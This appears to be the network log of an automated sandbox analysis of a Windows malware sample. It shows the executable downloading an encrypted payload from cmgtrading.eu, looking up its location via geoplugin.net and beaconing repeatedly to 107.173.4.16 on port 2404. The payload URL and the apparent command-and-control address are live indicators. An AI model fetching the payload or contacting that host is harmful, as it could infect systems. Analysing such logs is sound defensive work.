                                    Sep 25, 2024 16:01:32.838156939 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838170052 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838182926 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838187933 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838187933 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838196039 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838208914 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838222980 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838238001 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838263988 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838278055 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838283062 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838283062 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838291883 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838304996 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838320971 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838346004 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838346004 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838474035 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923569918 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923595905 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923609972 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923620939 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923635006 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923646927 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923660994 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923661947 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923675060 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923688889 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923702002 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923713923 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923724890 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923732042 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923733950 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923733950 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923733950 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923737049 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923752069 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923763990 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923794031 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923804045 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923804045 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923804045 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923855066 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923912048 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923924923 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923954010 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923955917 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923986912 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924000978 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924001932 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924040079 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924088955 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924101114 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924112082 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924124956 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924153090 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924153090 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924248934 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924277067 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924288988 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924299955 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924313068 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924324989 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924339056 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924345970 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924345970 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924351931 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924365044 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924376011 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924376965 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924391985 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924405098 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924405098 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924432993 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:33.078700066 CEST8064861178.237.33.50192.168.2.4
                                    Sep 25, 2024 16:01:33.078845978 CEST6486180192.168.2.4178.237.33.50
                                    Sep 25, 2024 16:01:35.449558973 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:35.456513882 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456593990 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456604958 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456614971 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456633091 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:35.456636906 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456655025 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456665993 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456774950 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:35.457263947 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.457349062 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.457357883 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461541891 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461553097 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461563110 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461651087 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461963892 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461973906 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461982965 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.525186062 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:35.530986071 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.531052113 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:39.232626915 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:39.237751007 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:39.242528915 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:02:09.265113115 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:02:09.267034054 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:02:09.274669886 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:02:39.289917946 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:02:39.291363001 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:02:39.296303988 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:03:09.310900927 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:03:09.313390017 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:03:09.318295002 CEST240464860107.173.4.16192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 15:59:46.554647923 CEST | 53 | 52255 | 162.159.36.2 | 192.168.2.4
Sep 25, 2024 15:59:47.081538916 CEST | 53 | 62213 | 1.1.1.1 | 192.168.2.4
Sep 25, 2024 16:01:27.144062996 CEST | 64642 | 53 | 192.168.2.4 | 1.1.1.1
Sep 25, 2024 16:01:27.331731081 CEST | 53 | 64642 | 1.1.1.1 | 192.168.2.4
Sep 25, 2024 16:01:31.459913015 CEST | 52250 | 53 | 192.168.2.4 | 1.1.1.1
Sep 25, 2024 16:01:31.469832897 CEST | 53 | 52250 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 25, 2024 16:01:27.144062996 CEST | 192.168.2.4 | 1.1.1.1 | 0x853d | Standard query (0) | cmgtrading.eu | A (IP address) | IN (0x0001) | false
Sep 25, 2024 16:01:31.459913015 CEST | 192.168.2.4 | 1.1.1.1 | 0xcdec | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 25, 2024 16:01:27.331731081 CEST | 1.1.1.1 | 192.168.2.4 | 0x853d | No error (0) | cmgtrading.eu | | 185.26.107.57 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 16:01:31.469832897 CEST | 1.1.1.1 | 192.168.2.4 | 0xcdec | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                    • cmgtrading.eu
                                    • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 64858 | 185.26.107.57 | 80 | 1800 | C:\Users\user\AppData\Local\Temp\Conspect124.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 16:01:27.344324112 CEST | 172 | OUT | GET /eODGqfP132.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: cmgtrading.eu
Cache-Control: no-cache
Sep 25, 2024 16:01:27.983258963 CEST | 391 | IN | HTTP/1.1 301 Moved Permanently
                                    server: nginx
                                    date: Wed, 25 Sep 2024 14:01:27 GMT
                                    content-type: text/html
                                    content-length: 162
                                    location: https://cmgtrading.eu/eODGqfP132.bin
                                    set-cookie: SERVID=B; path=/
                                    connection: close
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 64861 | 178.237.33.50 | 80 | 1800 | C:\Users\user\AppData\Local\Temp\Conspect124.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 16:01:31.478108883 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Sep 25, 2024 16:01:32.079047918 CEST | 1170 | IN | HTTP/1.1 200 OK
                                    date: Wed, 25 Sep 2024 14:01:31 GMT
                                    server: Apache
                                    content-length: 962
                                    content-type: application/json; charset=utf-8
                                    cache-control: public, max-age=300
                                    access-control-allow-origin: *
                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                    Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.4 | 64859 | 185.26.107.57 | 443 | 1800 | C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2024-09-25 14:01:28 UTC | 214 | OUT | GET /eODGqfP132.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Cache-Control: no-cache
                                    Host: cmgtrading.eu
                                    Connection: Keep-Alive
                                    Cookie: SERVID=B
                                    2024-09-25 14:01:29 UTC | 318 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Wed, 25 Sep 2024 14:01:28 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 494656
                                    Last-Modified: Wed, 25 Sep 2024 08:43:41 GMT
                                    Connection: close
                                    ETag: "66f3cd3d-78c40"
                                    Expires: Fri, 25 Oct 2024 14:01:28 GMT
                                    Cache-Control: max-age=2592000
                                    Accept-Ranges: bytes
                                    2024-09-25 14:01:29 UTC16066INData Raw: 02 75 e1 a1 66 75 35 8d 41 f3 38 57 8e 20 0e 52 e6 2e ca 7f 20 d9 a8 a9 0f e3 8e a2 97 5e f6 87 fc 3a cf 40 f6 89 54 a8 65 0b f4 dd 5f a3 d8 42 6f e5 a2 ad 17 47 ca d6 50 92 e1 85 a8 70 fd 4d 6c bc 41 d4 4e 7d 66 a3 9c c2 39 f7 39 e7 cc db 8d 66 f5 1d 6a d4 a6 e9 32 ec ed 1b 93 71 f6 e5 b5 c2 81 14 17 18 16 c6 af b6 d0 36 f9 40 14 bf b8 06 80 75 b9 8b bd c9 38 9a 4a 6d 87 a8 83 6e f2 92 33 7b d6 91 eb 56 b6 a6 14 b9 07 f1 18 49 0b 35 94 eb f9 c6 41 23 78 ea 3f 2e 2a 22 8a ae ec 01 50 98 ad 66 0f 08 f9 90 4c e9 00 ea c1 fd 79 97 4a f0 de f3 36 61 91 05 7c 79 4d 56 18 1c d5 f6 90 1e 68 0b f7 33 f3 a7 3f 1c 2b c7 43 a7 94 49 54 bd 6f c6 fc d0 fa 2a 8e 98 0d 6e 78 9f 19 6d 11 0d 2c 83 e7 15 ff 28 75 f9 ff 48 d1 17 c5 28 ab f7 8f 41 21 32 0f 14 60 ea 8b 5c a1
                                    Data Ascii: ufu5A8W R. ^:@Te_BoGPpMlAN}f99fj2q6@u8Jmn3{VI5A#x?.*"PfLyJ6a|yMVh3?+CITo*nxm,(uH(A!2`\
                                    2024-09-25 14:01:29 UTC16384INData Raw: 86 dc 98 72 6c ea bf 51 06 fd 0d a2 19 73 47 28 a3 75 0a f6 ef 47 f9 23 c4 ec bc 37 22 ae 03 f3 bb bc eb a1 3c 5e 67 cb 72 33 e4 dc 7d be 5f da 48 b8 d7 07 22 44 81 f8 3a be f1 70 c2 fe df 01 65 ab 0b fe 2b 69 e8 bf 8f 36 74 4d d8 39 8a 73 39 97 53 91 b8 b1 e0 fd a0 3a 50 47 ac 51 06 2c 95 17 f0 b7 5c da b9 21 a5 9d 93 41 30 64 ef 52 b3 78 c0 3a 42 73 8a eb 28 63 bf 34 cc f8 a7 89 40 f6 a7 6f c4 33 89 b5 a5 4a 95 4f f7 14 0c 64 34 97 1e 3d 39 9d 63 82 b9 3b 1d 66 e8 24 e7 fa a2 0d 6c 80 7c b7 ba e9 a2 f8 ae 6f c6 30 2e ba de 55 67 bd a9 ba 79 40 be 9c b9 24 0f 18 51 68 36 8c e7 b7 18 c1 03 00 1f 05 b9 23 72 1b ec 4e 1e bd c8 4b 9c c8 5a 36 eb 14 08 39 97 c4 10 2a d6 71 62 24 85 7d fa c2 75 59 36 60 5f 1e dd 6c bd 3f bc 8a b1 82 ba 1c 0d db 35 31 80 42 8a
                                    Data Ascii: rlQsG(uG#7"<^gr3}_H"D:pe+i6tM9s9S:PGQ,\!A0dRx:Bs(c4@o3JOd4=9c;f$l|o0.Ugy@$Qh6#rNKZ69*qb$}uY6`_l?51B
                                    2024-09-25 14:01:29 UTC16384INData Raw: 14 af 91 9c 86 af 75 53 7b 05 bf 99 f2 0c ee c3 e0 46 74 30 84 30 72 26 f9 60 56 0e 23 dc 65 ed e1 29 da 6f d6 af f6 3e 60 35 2f 7e e1 e9 0b 40 ff 02 a4 26 51 19 87 40 13 10 c7 01 9c 5b 74 b9 11 0c f8 e2 66 d9 f9 a2 f4 5c 8e d5 dd 14 ab 78 1e 01 8a 3c 59 6e ec de 79 4d 56 95 91 b1 72 d7 cc c8 a6 21 4d bb 3e 05 7a ee 98 ad 52 a4 9f 9b c3 a2 23 d5 2d ea b4 26 a3 c2 ff 62 b1 0d 78 30 73 7a 1a dd 73 33 0f 2f 0c 7a 02 ef ec 16 92 ba df 48 d6 9f b3 15 af 5d 02 d9 46 77 9f b4 25 fe 8b 0c 6f 7a e8 68 27 dc 4d f2 1b 6d 9a 27 3e 78 41 63 7f a1 44 2b cf 47 5b 2d b8 1e ff 72 bc 48 6b c6 84 1b c1 4e 9c 12 f8 ae a9 c9 69 50 76 ae c3 0d 6f 8f 90 5b de 6d be 9f 07 65 4c a8 68 3f a5 68 89 91 74 29 6b 7a 0c 90 f0 8f 59 d7 82 40 e8 3b c1 62 5e a4 a6 7c 1a 8d 15 a5 45 2f 00
                                    Data Ascii: uS{Ft00r&`V#e)o>`5/~@&Q@[tf\x<YnyMVr!M>zR#-&bx0szs3/zH]Fw%ozh'Mm'>xAcD+G[-rHkNiPvo[meLh?ht)kzY@;b^|E/
                                    2024-09-25 14:01:29 UTC16384INData Raw: 7d e0 77 89 72 40 37 b5 77 54 60 f6 42 e5 2d 01 f2 25 60 d3 4b 7b 1b 9e c4 e7 f9 4d dc 7c cd c7 26 96 65 68 ea fa 19 51 9a d9 36 dc ce 0f 82 ac 49 b6 d6 05 03 ea de 97 a6 81 82 3b a9 f3 5a 39 6f 7a 76 5a 89 ab d1 1f 3f 67 5e 75 23 25 a3 f8 85 1a 45 18 3a 93 16 fb da d6 44 38 45 b1 81 4f 1a 54 ed 5d 0c 18 05 0c c5 52 08 5e 6d c6 f9 76 4c 99 fa 9f 1b 1e 1e 1e a3 63 59 f0 cb 30 be 0b cc 0d 4a bc 0a 34 af 2f 76 c4 66 d7 ef a8 2c eb 1a bb 37 7d a7 68 60 b2 af 09 51 9d b4 64 57 68 a4 a4 15 de fb ac f2 df 58 5a c3 64 56 c0 99 5a a1 aa a5 cf 91 4d 3f 2b 63 a4 5f be 6e 9b 81 71 74 64 46 2e 4b f6 8d 3b 87 38 99 6c ab 91 ae 8c c3 ab fd c1 18 5b bc f8 23 0d 92 02 f8 d3 89 6b a4 b6 3b e2 31 cb da 6f ca 11 f3 de 86 e2 98 43 af d5 1a d6 b5 6f 47 79 91 9c a5 34 51 c0 4d
                                    Data Ascii: }wr@7wT`B-%`K{M|&ehQ6I;Z9ozvZ?g^u#%E:D8EOT]R^mvLcY0J4/vf,7}h`QdWhXZdVZM?+c_nqtdF.K;8l[#k;1oCoGy4QM
                                    2024-09-25 14:01:29 UTC16384INData Raw: 1f 2c c0 53 a0 e7 b5 9f 7c 9c 9d 75 1b f2 4a 82 75 71 3f 1b c1 13 fe 24 3a c6 8b 20 9d e3 2a 32 3c 3b 67 c4 9c 21 ef 4a b5 e6 61 c9 65 f8 03 a3 aa 8d 73 da fa 9e 69 6b 9a b2 f3 7e 9a 0b 49 a8 b1 12 6d 36 58 96 2e 37 a9 6a ea 80 57 0b 65 c5 53 48 4b ed a3 82 d8 ea 09 03 e0 dd 63 e7 ec 16 a9 40 bd 2f 3c 39 44 e0 76 16 a5 f0 23 7f 74 e7 7d a6 1b 44 89 82 9e e8 0f ed bd 48 b8 d9 a5 06 c1 bc 63 09 2b 35 ff 05 e8 d6 39 38 75 c0 c5 32 ba 60 df 85 ed 5a 52 a8 ff 3e 01 27 c3 0a 04 21 e5 d3 b7 32 3e 62 e9 e4 e4 fa 61 c5 95 57 c1 57 04 09 c5 52 b5 a4 00 cb fb bd f5 e9 82 0c 1d 59 a1 83 68 08 33 cb 3b db b2 d8 67 9a 69 b4 f6 86 e1 52 7b 2f 55 7d 31 6f 97 d5 63 e9 e7 15 cd 8a 3b f2 f4 eb 27 da e2 9e f2 cf 3b 8e 76 7c c8 03 9b a1 c6 c5 5e 27 f5 1a 21 77 c4 43 1e a7 d3
                                    Data Ascii: ,S|uJuq?$: *2<;g!Jaesik~Im6X.7jWeSHKc@/<9Dv#t}DHc+598u2`ZR>'!2>baWWRYh3;giR{/U}1oc;';v|^'!wC
                                    2024-09-25 14:01:29 UTC16384INData Raw: 2b f4 d1 93 d0 69 c4 b6 e4 ac 96 8f 34 ba 09 28 00 79 23 dc 56 79 6b df 96 fe d5 55 a9 44 ae ef a8 79 7f c1 23 31 20 17 fd 26 99 ae cf 11 ed 4e 73 e3 33 09 6b 26 35 08 1a 13 5c d0 8e da 01 1d d4 fb 2c 8b 97 56 6e a4 97 40 3c 5e d9 49 8f 03 f5 26 db 6b ff 8b 94 93 09 32 9d 3d 74 4d 00 10 51 ab 93 2b c7 38 a9 ab 83 b0 ba 32 09 d7 f2 37 9a ed 22 e8 72 b5 95 d9 70 41 ed 7b 74 3c b1 b9 5e 54 69 ee a7 03 ff 13 04 15 4a d6 9c 7d 70 8b 62 e7 0c 03 9c 17 72 99 04 71 3e f7 35 9b 56 9e 46 e5 c0 44 ac 73 cb ab 63 17 ed ea bd 27 79 26 32 a4 5c c3 8c 00 11 f9 62 83 c3 dd 73 6d 83 5b 96 f5 d1 80 1c 81 f6 18 da 71 1f 09 16 72 23 56 f1 1d 2f 3e 96 7e 1d 51 c2 63 1a db ca f9 c4 1a 8e cf 19 ad e8 56 02 69 a8 c3 18 73 3d 7e 37 19 b6 c8 f2 17 f4 64 c0 32 34 da 6d 07 74 8e 70
                                    Data Ascii: +i4(y#VykUDy#1 &Ns3k&5\,Vn@<^I&k2=tMQ+827"rpA{t<^TiJ}pbrq>5VFDsc'y&2\bsm[qr#V/>~QcVis=~7d24mtp
                                    2024-09-25 14:01:29 UTC16384INData Raw: 3b 31 37 c6 e2 a2 72 a9 97 f4 75 62 84 b4 10 4b a9 21 19 8d b3 3d 35 c7 16 77 6b 31 1c 28 a3 33 9d 63 6d 47 4f 08 0e 58 e2 d9 17 e5 8d 33 b4 e9 06 b6 2d a1 76 2c 24 01 e0 9c 5a 63 6b d3 fd bd 38 c3 8f 77 2c 64 08 d9 11 b5 48 c4 55 b7 b5 4e 87 34 60 f5 d9 8e aa 10 ea 03 f9 0e 62 fb 17 c0 5f 0d aa 96 87 d9 88 93 0e 80 b2 8f 06 72 10 32 bc 17 e5 98 58 c7 34 c8 a1 14 0f 50 d6 52 d3 04 4b 24 6b 7b 29 b5 24 71 b9 bf f1 ae bf ae 10 33 57 6e 6e b0 35 b5 7b 4f 46 64 ff 54 7d 39 16 c6 99 a0 52 5e 99 0d 00 e8 ac c0 1b 03 5c 9e b6 d1 8d 3c 06 a4 1e 18 59 12 c5 06 7c 61 62 b9 a7 fa 61 c2 f5 ee 6b e6 f8 78 e5 03 45 16 85 75 b7 f4 8f a6 15 f8 cf 61 60 aa 11 81 ae 7c 99 5e c2 20 84 a3 50 88 c7 0a b9 70 56 37 db 15 19 7d 11 b3 92 8a 1e 94 32 1d 36 d8 7a e1 de 59 9f b2 e9
                                    Data Ascii: ;17rubK!=5wk1(3cmGOX3-v,$Zck8w,dHUN4`b_r2X4PRK$k{)$q3Wnn5{OFdT}9R^\<Y|abakxEua`|^ PpV7}26zY
                                    2024-09-25 14:01:29 UTC16384INData Raw: f1 1d d6 09 af 33 20 11 a2 a4 ba c9 9d e1 8a dc e1 e5 eb 26 72 cc b1 18 2a ae 06 c6 aa 65 0e 6c 25 2d 8d c7 54 35 7a 71 d4 3e 40 b5 99 5f 7d 14 07 01 db 59 fc 89 4e 8d 1f a7 86 af 4a 16 1d 66 1d 13 62 c1 6c d8 4d 4a ba 61 0a 15 36 30 1b f6 f6 fd f3 e5 30 f2 17 af 5d 60 a5 3b 12 4d 6c c1 39 cb b7 50 34 28 c1 aa af 15 de 74 41 80 eb 62 2c eb 70 f4 07 87 1e 88 87 b0 27 79 c0 90 87 b3 69 26 41 c4 46 42 1c ad ee 56 e2 2d f9 23 6b 17 c3 32 d3 fe 5f db ac 58 8e 70 5b b2 3e 98 a2 96 49 5d 19 61 a8 b2 66 f6 44 e3 32 c9 e8 4b bb b0 f1 d9 c1 a5 98 26 f9 95 bb 21 ca 60 69 d2 1a 0b 0c 98 ee 81 2d 52 c6 51 24 0f 8c bf 48 dc ef 38 04 70 80 a1 2a 44 a2 16 c1 e2 d0 af cd c3 3e 87 c1 12 29 66 e1 5d b4 a0 59 bd dc 0a a0 44 55 58 08 11 78 9c e5 51 ff 9f 6c 78 c7 90 4f 9a a4
                                    Data Ascii: 3 &r*el%-T5zq>@_}YNJfblMJa600]`;Ml9P4(tAb,p'yi&AFBV-#k2_Xp[>I]afD2K&!`i-RQ$H8p*D>)f]YDUXxQlxO
